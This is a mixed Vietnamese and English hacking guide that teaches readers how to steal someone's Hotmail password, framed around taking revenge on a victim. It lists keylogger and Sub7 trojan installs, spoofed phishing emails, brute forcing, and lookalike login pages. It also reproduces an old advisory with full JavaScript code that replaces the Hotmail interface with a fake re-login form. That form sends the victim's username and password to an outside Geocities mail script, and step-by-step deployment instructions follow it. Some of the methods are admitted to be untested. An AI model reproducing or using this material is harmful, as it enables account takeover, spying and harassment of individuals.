OK, bạn muốn có password của ai đó ? bạn muốn biết thêm một số kiến thức về hacking, bạn chỉ muốn trả thù một ai đó. Được thôi chúng ta bắt đầu
Trước khi bạn bắt đầu đọc các cách để có được hotmail password bạn phải nhớ những điều sau:
- Không đựơc làm những điều này ở trường hay công sở.
- Nên nhớ rằng Hotmail có thể ghi lại tất cả những gì bạn làm...
- Nếu bạn làm việc này vì tiền và COP phát hiện bạn sẽ bị... kể cả bạn đã xoá hết chứng cứ. Đừng bao giờ quá tin tưởng.
- Nên nhớ rằng bây giờ hacking được xem như là hoạt động khủng bố.
- Không phải là hay nếu bạn kể cho nhiều ngưòi khác về bài này
Cách thức:
Cách thức phụ thuộc vào mức độ nạn nhân dễ bị lừa đến mức nào , và/hoặc nếu bạn có thể truy cập vào PC của họ ở mức vật lý...
1) Theo tôi nghĩ cách dễ nhất là : cố gắng nhìn trộm khi họ đang đánh mật khẩu.
2) Nếu bạn có thể sử dụng máy của họ, hãy thử cài một con trojan keylogger (bạn có thể download chúng ở bất cứ đâu trên net) Nó sẽ ghi lại tất cả các phím mà nạn nhân gõ xuống . Nếu nó ghi lại dưới dạng file text, hãy tìm kiếm tên và mật khẩu của họ. Nó tuỳ thuộc vào sự nhanh trí của bạn.
3) Nếu bạn có thể sử dụng máy mà họ thường xuyên dùng , và password của nạn nhân được save trong Outlook nhưng ở dạng mã hoá (*) thì bạn hãy download 'Snadboy's Revelation' (v. một chương trình nhỏ) nó sẽ cho phép bạn xem mật khẩu một cách dễ dàng.
4) Trên những trang chuyên về Spy, bạn có thể down load hay mua một số sản phẩm có thể chôm chỉa được mọi thông tin của người khác.
5) Nếu nạn nhân đã từng viết mật khẩu ở đâu đó hãy thử tìm kiếm
6) Với một con trojan như Sub7 bạn có thể điều khiển máy tính của người khác. Bạn có thể lấy mật khẩu được 'saved' và bạn cũng có thể bật chức năng keylogger.
7) Nếu bạn download 'Ghostmail' bạn có thể giả mạo một bức thư đến từ 'Hotmail Team' hoặc bất kỳ đâu, và làm cho nó như thể là một quy địnhormal and pretend that you need to verify that they are the rightful owners or whatever and và yêu cầu họ trả lời lại với Mật khẩu. Bức thư đó được chuyển tới một địa chỉ của Hotmail nhưng thực ra nó được gửi về địa chỉ của bạn.
Vài năm trước đây tôi có downloads một file mà chương trình anti-virus coi như là vius. Nó là một chương trình nhỏ xuất hiện và thông báo với bạn rằng cookie đã mất tác dụng và yêu cầu bạn nhập lại tên và mật khẩu. Khi đó nó sẽ lưu lại thành 1 file ở ổ C. Bạn có thể lấy file đó bằng một cách nào đó chẳng hạn bằng một chương trình trọan điều khiển từ xa.
9) Nếu bạn biết rõ về nạn nhân hãy cố đoán password hoặc đánh lừa bằng Email tới một người khác biết rõ về nạn nhân . Hãy sử dụng chí tưởng tượng của bạn.
10) Hãy tìm kiếm xung quanh bàn làm việc của nạn nhân hay bất cứ đâu(nếu nạn nhân đã ghi nó lại).
11) Thử Love, Mum, God, Beckham 1234 (hay 4321 ..) hoặc tên một ai đó nạn nhân yêu thích. Bạn cũng thử luôn những từ như secret, password và số điện thoại..etc.
12) Nếu bạn đủ ma quái bạn có thể lấy được mật khẩu bằng cách nào đó you can gain the victim's trust somehow to get it.
13) Thuê một hacker để làm việc này cho bạn.
14) Nếu bạn biết một mật khẩu khác của nạn nhân thì thật đơn giản vì nhiều người thường chỉ sử dụng một mật khẩu cho mọi thứ
15) OK chúng ta tiếp tục cách này là cách mà tất cả hackers sẽ trả lời bạn nếu bạn hỏi họ làm thế nào để hack hotmail. Tới
http://www.hackology.com/ và download Munga Bunga's HTTP Brute Forcer AND The definition files package (and a good word list if you can find one somewhere - but you will have to modify it from *.txt to *.lst and put it in the correct location, replacing the old one). Once you are ready, READ all of the help files that come with it and then use common sense to tick the appropriate boxes in the brute forcer. (Tick 'Don't try passwords shorter than 8 characters) because Hotmail doesn't allow you to have shorter passwords than that so it saves time. Munga Bunga's is the quickest one software wise. Depending on the quality of your wordlist and your connection speed though it could take days/hours to get someone's password this way.
16) What you could do is, you make a site saying something like 'Send an email to
.....@hotmail.com and in the email subject line put your victim's username, followed by your username and your password, separated with dots. Within a few days you should receive an email with your victim's password as the hotmail servers will have given your username admin priveleges.' Basically you con people into giving you their passwords.
17) You could also copy all of the HTML code of the hotmail site and use it on your own site and buy a domain name really similar like
www.hotnail.com and send an email using Ghostmail telling people to check out the new and better service etc or tell your friends. (In the email tell them to click on a link not type it out otherwise they will notice - Link like CLICK HERE). With this method you will have to change the HTML code slightly though so that it sends the info to you somehow (not sure how as I am not that good with HTML) and then link them back to hotmail or something so they don't notice. (CHECK FURTHER ON IN THE FILE THERE IS A METHOD SIMILAR)
18) OK there are 4 methods by SnEzE here that I have, but I am not sure they work because I have never tried them. Here they are anyway: ( I Will put my comments in XX's )
Brute force hacking
a. Sử dụng telnet để connect tới port 110 (Hotmail´s server)
b. Đánh USER và username của nạn nhân
c. Đánh PASS và đoán password
d. Lặp lại cho đến khi bạn tìm được mật khẩu chính xác.
!. This is called brute force hacking and requires patience. It´s better than trying to guess the victims password on hotmail homepage only because it´s faster.
XX I am not sure this works as this file might be antient XX
19 ) By SnEzE again:
Cách tốt nhất
a. Sau khi đã có username của nạn nhân ( Nó thường ở trong điạ chỉ email )
b. Bạn gõ "
www.hotmail.com/cgi-bin/start/tên nạn nhân "
c. Bạn đã ở trong hòm thư!
Cách hack này chỉ hoạt động nếu bạn cùng mạng mới nạn nhân hoặc nếu nạn nhân chưa log out.
20) By SnEzE again:
I_3_I - Cách cổ điển
a. Tới Hotmail´s homepage và tạo một hòm thư (nếu bạn chưa có)
b. Log Out
c. Bây giờ đánh username của nạn nhân.
d. Xem source code. XX trong Internet Explorer, (View/Source). XX
e. Ở hàng thứ 15 bạn sẽ tìm thấy "action=someadress"
d. Copy adress đó và paste vào trường adress
e. Bạn đang ở đâu zậy...
21) By SnEzE again:
I_4_I - Cách khác...
a. Tới hotmail´s homepage
b. Copy toàn bộ source code.
c. Tạo một file html mới có cùng code nhưng thay method=post thành method=enter
d. "view" trang này
e. Thay đổi adress thành
www.hotmail.com/ (đừng nhấn Enter!)
f. Làm thế nào để victim nhập username và password vào đó
g. Nhìn lên thanh adress. Bạn sẽ thấy ...&password:gì đó...
Đó là cách tôi dùng, vì nó dễ dàng cho tôi thấy password. ( Nếu nạn nhân tắt browser bạn có thể xem nó trong thư mục History!
----------------------------
Còn đây là bản hướng dẫn khác :
THE "HOT"MAIL EXPLOIT AND HOW TO PROTECT YOURSELF
This document describes a serious security problem we discovered with
Microsoft's Hotmail Service which allows malicious users to easily
steal the passwords of Hotmail users. The exploit involves
sending e-mail messages that contains javascript code as part of
the message. When a Hotmail user views the message, the
embedded javascript code forces the user to re-login to Hotmail.
In doing so, the victim's username, password, and ip address is sent to the malicious user by
e-mail.
Once a malicious user knows the password to the victim's Hotmail account, she can assume full
control of the account, including the ability to:
delete, send, and read the victim's e-mail
check mail on other mail servers that the victim has configured for mail-checking
access the victim's address book
discover other passwords sent as confirmation of registration in old e-mails
change the password of the Hotmail account
The security problem is easy to take advantage of. A would-be hacker needs only to embed the
javascript code into the body of an e-mail message using a standard e-mail program such as
Netscape Mail (free). In a working demonstration of this exploit, we show that even users without
their own internet service provider (ISP) can steal an arbitrary number of Hotmail passwords by
using a free Geocities account.
We believe the "Hot"mail exploit to be a serious security concern for the following reasons:
1.The malicious code runs as soon as e-mail message is viewed
2.The resources required to launch the attack are minnimal and freely available.
3.The malicious e-mail can be sent from virtually anywhere, including libraries, internet cafes,
or classroom terminals
4.The exploit will work with any javascript-enabled browser, including the Microsoft Internet
Explorer and Netscape Communicator.
Because-we-can.com has notified both Microsoft and Hotmail that a security problem exists. We
are making the following detailed information about the "Hot"Mail exploit publicly available to
speed the process of fixing the security hole. In general, we believe that when the public is aware
of serious security problems, expedient measures are taken to solve those problems. Learn how
to protect yourself from "Hot"Mail in the short term by clicking on "How to protect yourself".
HOW THE "HOT"MAIL EXPLOIT WORKS
Why does the "Hot"Mail exploit work? The security problem lies in Microsoft's Hotmail service
itself. Hotmail makes no attempt to filter Javascript code from email messages, allowing malicious
users to embed arbitrary javascript programs into their e-mail messages. Javascript programs do
not normally constitute a security problem when they are used in personal web-pages. However,
when javascript code is embedded into a Hotmail message, it can alter the properties of the
Hotmail user-interface itself.
In the case of the exploits we describe, the javascript alters the properties of every link in the
Hotmail interface that the user could click on. The links are altered so that when the user clicks on
them, an (bogus) Hotmail message is displayed, informing the user that they have timed-out of
their Hotmail session and must log-in again to continue. The (bogus) time-out page also gives the
user some text-entry fields where they can type in their username and password to re-login.
However, when the user types in their username and password, the information is sent back to the
malicious user.
In the exploits we describe, the part of the program that does the actual "dirty-work" of mailing the
password and username is provided by Geocities as a (free) service to all their members. This
should not be viewed as an oversight or problem with Geocities, since there are thousands of
equivalent server-side mailing programs that we could have used in it's place.
The "Hot"Mail exploit is just one of many potentially damaging javascript programs that could be
embedded into mail messages. Since javascript code in email messages can run as soon as the
message is viewed, and can alter virtually any aspect of the user interface, we urge Hotmail to
implement a javascript filter.
HOW TO PROTECT YOURSELF FROM "HOT"MAIL
Until Hotmail fixes the security problem, we suggest that Hotmail users turn off javascript in their
browsers. Even users familiar with our version of the exploit may be vulnerable to other javascript
programs embedded in Hotmail messages.
Netscape users can turn javascript off in their preferences (edit / preferences / advanced / disable
javascript).
Microsoft Internet Explorer users can turn jscript off in their preferences (view / internet options /
security / custom settings / scripting / disable active scripting).
This demonstrates how we used the "Hot"Mail exploit with minimal resources to steal passwords from Hotmail users. Our goal was to show that using only the items listed below, we could steal a victim's Hotmail password and remain anonymous.
INGREDIENTS:
• 1 Computer with Internet Access
• 1 Netscape Mail (or equivalent e-mail program)
• 1 Notepad (or equivalent text editor)
STEP 1:
We visited hotmail.com and registered for a free e-mail account. We did not have to enter valid contact information during the registration process.
STEP 2:
We visited Geocities.com and registered for a free homepage. We chose the username ybwc. We did not have to enter valid contact information during the registration process, except for an e-mail address. We used the e-mail address from step 1. As part of our registration, we were given a new free email account from Geocities (ybwc@geocities.com).
STEP 3:
We opened our notepad and typed in the following text, which we then saved as message.htm. Line 17 contains our Geocities username (ybwc), from step 2.
<html><head></head><body>
<p>"Go where you want today" - Blue Adept</p>
<script>
function getmess(){
return "<table border=0 cellpadding=5 cellspacing=5 width=508 height=90%>" +
"<tr valign=middle>" +
"<th colspan=2>" +
"<font face="Arial, Helvetica" size="5">" +
"We're Sorry, We Cannot<br>Process Your Request" +
"</font></th></tr>" +
"<tr valign=middle><td align=center>" +
"<font face="Arial, Helvetica" size="3">Reason: </font>" +
"<font face="Arial, Helvetica" size="3" color="#ff0000"><b>Time expired. Please re-login.</b></font><br>" +
"<font face="Arial, Helvetica" size="2"><a href="http://www.hotmail.com/errormsg.html">(Get more info regarding error messages here)</a></font>" +
"</td></tr>" +
"<tr valign="middle"><td align="center">" +
"<FORM METHOD=POST ACTION="http://www.geocities.com/cgi-bin/homestead/mail.pl?ybwc" target="_top">" +
"<INPUT TYPE="hidden" NAME="next-url" VALUE="http://www.hotmail.com">" +
"<INPUT TYPE="hidden" NAME="subject" VALUE="Hotmail Password">" +
"<table cellpadding="0" cellspacing="5" border="0">" +
"<tr><td><font face="Arial, Helvetica" size="2">Login Name:</font><br><input type="text" name="login" size="16" maxlength="16"></td><td><font face="Arial, Helvetica" size="2">Password:</font><br><input type="password" name="passwd" size="16" maxlength="16"> <input type="submit" value="Enter"></td><tr>" +
"</table></form></td></tr>" +
"<tr valign=middle><th colspan=2 align=center>" +
"<font face="Arial, Helvetica" size="3">" +
"Return to <a href="http://welcome.to/www.hotmail.com" target="_parent">Hotmail's Homepage</a>." +
"</font></th></tr></table>" +
"<p><img src="http://209.1.112.251/c9698.gif" width=189 height=16 border=0 alt="Copyright 1996-1997">";
}
nomenulinks=top.submenu.document.links.length;
for(i=0;i<nomenulinks-1;i++){
top.submenu.document.links[i].target="work";
top.submenu.document.links[i].href="javascript:getmess()";
}
noworklinks=top.work.document.links.length;
for(i=0;i<noworklinks-1;i++){
top.work.document.links[i].target="work";
top.work.document.links[i].href="javascript:getmess()";
}
</script>
</body>
</html>
STEP 4: We composed a new e-mail message to our (example) victim,
victim@hotmail.com. We inserted the file message.htm into the e-mail message and then sent it.
STEP 5: We waited for our victim to check his Hotmail account. Shortly after he viewed our message, we checked our Geocities email. We received an e-mail message from Geocities that listed the ip address, username, and password of the Hotmail user
victim@hotmail.com